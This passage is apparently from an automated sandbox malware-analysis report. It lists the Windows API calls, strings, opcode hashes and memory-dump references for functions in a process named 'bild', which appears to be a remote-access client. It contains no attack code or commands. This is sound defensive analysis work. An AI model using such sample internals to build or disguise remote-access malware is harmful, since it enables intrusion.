                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
                                                                                          • String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
                                                                                          • API String ID: 3779116287-2600120591
                                                                                          • Opcode ID: 67484a9d389779804940ba9c5ec62be4ee321b08fc9342a56252b28d4b9918b0
                                                                                          • Instruction ID: 1f9a4f0ce9ce2038842d239495dc50e58c380b2d1dc072d0c6c391bd72002940
                                                                                          • Opcode Fuzzy Hash: 67484a9d389779804940ba9c5ec62be4ee321b08fc9342a56252b28d4b9918b0
                                                                                          • Instruction Fuzzy Hash: 9C01B1B990521D66CB109BB0AC41FEAF77C9B1470DF100199EC1996940EE21BA548BA4
                                                                                          APIs
                                                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,75A78400,?), ref: 111432C7
                                                                                          • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 111432EF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateFile$CloseHandle
                                                                                          • String ID: "
                                                                                          • API String ID: 1443461169-123907689
                                                                                          • Opcode ID: 6335c3239e743a75aad2b4d26ce3924e96bfc614049b49f4e6d7105e566d10f2
                                                                                          • Instruction ID: 150de81b6b92e27c68bcdd2e608667d56283c35638c5ea37a79585d4ca6bceb2
                                                                                          • Opcode Fuzzy Hash: 6335c3239e743a75aad2b4d26ce3924e96bfc614049b49f4e6d7105e566d10f2
                                                                                          • Instruction Fuzzy Hash: 38217C30A1C269AFE3128E78DD54FD9BBA49F45B14F3041E0E4999B1C1DBB1A948C750
                                                                                          APIs
                                                                                            • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                          • SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,F3EE1E80,75922EE0,?,00000000,1118083B,000000FF,?,110300D6,UseIPC,00000001,00000000), ref: 1102D187
                                                                                            • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                            • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                            • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                            • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EDC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102D14A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
                                                                                          • String ID: Client$DisableGeolocation
                                                                                          • API String ID: 3315423714-4166767992
                                                                                          • Opcode ID: a2dd62344aa7ed2eba45e03fd0b01f9a1bb13e0d2f8602a6c4817aeae004d655
                                                                                          • Instruction ID: 1755caac6fc2658334c1ed2ebc8622a08952aff54e10c128aab6c20125b970ec
                                                                                          • Opcode Fuzzy Hash: a2dd62344aa7ed2eba45e03fd0b01f9a1bb13e0d2f8602a6c4817aeae004d655
                                                                                          • Instruction Fuzzy Hash: 8521E474A40315BBE712CFA8CD42B6EF7A4E708B18F500269F921AB3C0D7B5B8008785
                                                                                          APIs
                                                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110271DA
                                                                                            • Part of subcall function 110CD550: EnterCriticalSection.KERNEL32(00000000,00000000,75A73760,00000000,75A8A1D0,1105DCBB,?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD56B
                                                                                            • Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD598
                                                                                            • Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD5AA
                                                                                            • Part of subcall function 110CD550: LeaveCriticalSection.KERNEL32(?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD5B4
                                                                                          • TranslateMessage.USER32(?), ref: 110271F0
                                                                                          • DispatchMessageA.USER32(?), ref: 110271F6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
                                                                                          • String ID: Exit Msgloop, quit=%d
                                                                                          • API String ID: 3212272093-2210386016
                                                                                          • Opcode ID: 4c35fe21e6f1fdccfd242282fb0e51879004b37df93db9ac228ac0a7d4dc8e25
                                                                                          • Instruction ID: 083e85bce0718499e1b375aadfda5de5654481b636091be3423b85693ac47093
                                                                                          • Opcode Fuzzy Hash: 4c35fe21e6f1fdccfd242282fb0e51879004b37df93db9ac228ac0a7d4dc8e25
                                                                                          • Instruction Fuzzy Hash: 3D01D876E0521D66EB15DAE99C82F6FF3BD6B64718FD00065EE1092185F760F404CBA1
                                                                                          APIs
                                                                                          • GetTickCount.KERNEL32 ref: 110173FD
                                                                                            • Part of subcall function 11017300: WaitForSingleObject.KERNEL32(00000318,000000FF), ref: 1101733C
                                                                                            • Part of subcall function 11017300: CoInitialize.OLE32(00000000), ref: 11017345
                                                                                            • Part of subcall function 11017300: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101736C
                                                                                            • Part of subcall function 11017300: CoUninitialize.COMBASE ref: 110173D0
                                                                                            • Part of subcall function 11017220: WaitForSingleObject.KERNEL32(00000318,000000FF), ref: 11017252
                                                                                            • Part of subcall function 11017220: CoInitialize.OLE32(00000000), ref: 1101725B
                                                                                            • Part of subcall function 11017220: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017282
                                                                                            • Part of subcall function 11017220: CoUninitialize.COMBASE ref: 110172E0
                                                                                          • SetEvent.KERNEL32(00000318), ref: 1101741D
                                                                                          • GetTickCount.KERNEL32 ref: 11017423
                                                                                          Strings
                                                                                          • touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 1101742D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
                                                                                          • String ID: touchkbd, systype=%d, chassis=%d, took %d ms
                                                                                          • API String ID: 3804766296-4122679463
                                                                                          • Opcode ID: 66f2a400a49d4a3db1117531ae3dbc6183e4453ddcab9e324682772d92ed33ab
                                                                                          • Instruction ID: c54e938b4ab1921e6220328725fe5e45cb955b1045b44cf9de438437e8313787
                                                                                          • Opcode Fuzzy Hash: 66f2a400a49d4a3db1117531ae3dbc6183e4453ddcab9e324682772d92ed33ab
                                                                                          • Instruction Fuzzy Hash: 47F0A0B6E1011C6BE700DBF9AC8AE6BBB9CDB4471CB100026F910C7245E9A6BC1087A1
                                                                                          APIs
                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6C5D4FC4
                                                                                          • K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6C5D8E0D,00000000,?,6C5D8E0D,00000000,?,00000FA0,?), ref: 6C5D4FE4
                                                                                          • SetLastError.KERNEL32(00000078,00000000,?,6C5D8E0D,00000000,?,00000FA0,?), ref: 6C5D4FED
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressEnumErrorLastModulesProcProcess
                                                                                          • String ID: EnumProcessModules
                                                                                          • API String ID: 3858832252-3735562946
                                                                                          • Opcode ID: 3deeab1da30d3f07ac4b2a6c84a5d200bbeb9be6aed09a2d8aaf89ea86d16981
                                                                                          • Instruction ID: 1f45313c9618d1b82b77f5c4991c8e3b0a8d42ff715d9f74dc5a394723b8855a
                                                                                          • Opcode Fuzzy Hash: 3deeab1da30d3f07ac4b2a6c84a5d200bbeb9be6aed09a2d8aaf89ea86d16981
                                                                                          • Instruction Fuzzy Hash: 0AF05E76604318AFCB10DF99D844E5B77A8EB48722F00C91AF959D7A40C770E810CFA4
                                                                                          APIs
                                                                                          • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6C5D5014
                                                                                          • K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6C5D8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C5D5034
                                                                                          • SetLastError.KERNEL32(00000078,00000000,?,6C5D8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C5D503D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressErrorFileLastModuleNameProc
                                                                                          • String ID: GetModuleFileNameExA
                                                                                          • API String ID: 4084229558-758377266
                                                                                          • Opcode ID: 1e7e6d1112b7d689346f8ced7c03a28a78f843e9126600e9452f300af91f2a1b
                                                                                          • Instruction ID: b668353775b84e478f8563f09fc45590e4c1a8c49a3114c32819ef85dfabe2bd
                                                                                          • Opcode Fuzzy Hash: 1e7e6d1112b7d689346f8ced7c03a28a78f843e9126600e9452f300af91f2a1b
                                                                                          • Instruction Fuzzy Hash: BCF05EB2A15318AFCB20CF98E844E5777B8EB48712F00491AF946D7A40C671F8108BE5
                                                                                          APIs
                                                                                            • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                          • CreateThread.KERNEL32(00000000,00001000,Function_00137630,00000000,00000000,11138782), ref: 1113782E
                                                                                          • CloseHandle.KERNEL32(00000000,?,11138782,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11137835
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseCreateHandleThread__wcstoi64
                                                                                          • String ID: *AutoICFConfig$Client
                                                                                          • API String ID: 3257255551-59951473
                                                                                          • Opcode ID: 58a92f72c8c5fc2ca777e547e4c7fef86ef2c1d8c64fc3a44eb11c2425719861
                                                                                          • Instruction ID: 9aee7181833ba8711af7cecc10eced9f2f0784297ad8accf53734ae3fbf9e9e1
                                                                                          • Opcode Fuzzy Hash: 58a92f72c8c5fc2ca777e547e4c7fef86ef2c1d8c64fc3a44eb11c2425719861
                                                                                          • Instruction Fuzzy Hash: 98E0D8757A062D7AF6149AE98C86F65F6199744B26F500154FA20A50C4D6A0A440CB64
                                                                                          APIs
                                                                                          • Sleep.KERNEL32(000000FA), ref: 11070CB7
                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 11070CC4
                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 11070D96
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$EnterLeaveSleep
                                                                                          • String ID: Push
                                                                                          • API String ID: 1566154052-4278761818
                                                                                          • Opcode ID: a72291858ce6dc6b0c64ae6c986eadc989c908336576dbf916d062231e355c4c
                                                                                          • Instruction ID: e8f6e055aac827a13dfabc2dec6ad808bd843e21556e42594c7620890779e76f
                                                                                          • Opcode Fuzzy Hash: a72291858ce6dc6b0c64ae6c986eadc989c908336576dbf916d062231e355c4c
                                                                                          • Instruction Fuzzy Hash: 1B51CC78E04784DFE721DF64C880B8AFBE0EF09318F1546A9D8998B285D770BC84CB91
                                                                                          APIs
                                                                                          • EnterCriticalSection.KERNEL32(6C61B898,00000000,?,?,?,6C5DDA7F,?,00000000), ref: 6C5DA503
                                                                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 6C5DA568
                                                                                          • Sleep.KERNEL32(00000000,?,6C5DDA7F,?,00000000), ref: 6C5DA581
                                                                                          • LeaveCriticalSection.KERNEL32(6C61B898,00000000), ref: 6C5DA5B3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$EnterExchangeInterlockedLeaveSleep
                                                                                          • String ID:
                                                                                          • API String ID: 4212191310-0
                                                                                          • Opcode ID: 23d066f657de01694c948e18dc5c90fdd60513284a534c6f4a9dad37e088d223
                                                                                          • Instruction ID: 6ce86c6274da148b161707994638ed71208ef8689c4a0a7f58997b6c95419f75
                                                                                          • Opcode Fuzzy Hash: 23d066f657de01694c948e18dc5c90fdd60513284a534c6f4a9dad37e088d223
                                                                                          • Instruction Fuzzy Hash: 8C21A1B2A00300EFDF119B1ECC8269BB7B8ABC631AF160527D85693E51D771B9408B59
                                                                                          APIs
                                                                                          • GetCommandLineA.KERNEL32 ref: 00A51027
                                                                                          • GetStartupInfoA.KERNEL32(?), ref: 00A5107B
                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,?), ref: 00A51096
                                                                                          • ExitProcess.KERNEL32 ref: 00A510A3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3898205616.0000000000A51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A50000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3898187027.0000000000A50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3898223938.0000000000A52000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_a50000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                                          • String ID:
                                                                                          • API String ID: 2164999147-0
                                                                                          • Opcode ID: 490011d6a473ccbfc1b4b410c48ca93b1d01c888060ddf8bba764e8162775bd1
                                                                                          • Instruction ID: 742da974f26c7489b430c7fe5c9c0d2b4fc852702af21e853dd9a1e15b93d99a
                                                                                          • Opcode Fuzzy Hash: 490011d6a473ccbfc1b4b410c48ca93b1d01c888060ddf8bba764e8162775bd1
                                                                                          • Instruction Fuzzy Hash: 0A11AD204083C45AEB319FA089487FABFA5BB22387F640048ECD6961C6D2764CCFC7A5
                                                                                          APIs
                                                                                          • WaitForSingleObject.KERNEL32(?,000001F4), ref: 110306FC
                                                                                          • CloseHandle.KERNEL32(?), ref: 11030709
                                                                                          • FreeLibrary.KERNEL32(?), ref: 11030714
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 1103071B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
